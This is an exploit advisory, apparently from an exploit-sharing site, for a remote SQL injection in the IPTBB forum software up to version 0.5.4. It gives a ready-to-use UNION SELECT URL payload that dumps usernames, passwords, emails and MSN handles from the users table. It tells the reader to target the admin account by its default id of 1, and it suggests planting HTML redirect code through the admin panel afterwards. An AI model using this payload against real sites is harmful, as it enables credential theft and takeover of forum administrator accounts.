--------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Remote Sql Injection --------------------------------------------------------------- # Author: MhZ91 # Title: IPTBB <= 0.5.4 Remote Sql Injection # Download: http://sourceforge.net/projects/iptbb/ # Bug: Remote Sql Injection # Info: IPTBB is a free forum system built using PHP and mysql. # Visit: http://www.inj3ct-it.org --------------------------------------------------------------- http://[site]/index.php?act=viewdir&id='+union+select+1,concat(username,char(58),password,char(58),email,char(58),msn)+from+iptbb_users+where+id=[UserID]/* Change [UserID] whit id of member u want get user and password ( the default id of the admin is 1 ) . In the admincp.php , in general settings, u can insert a html code for redirect . ---------------------------------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论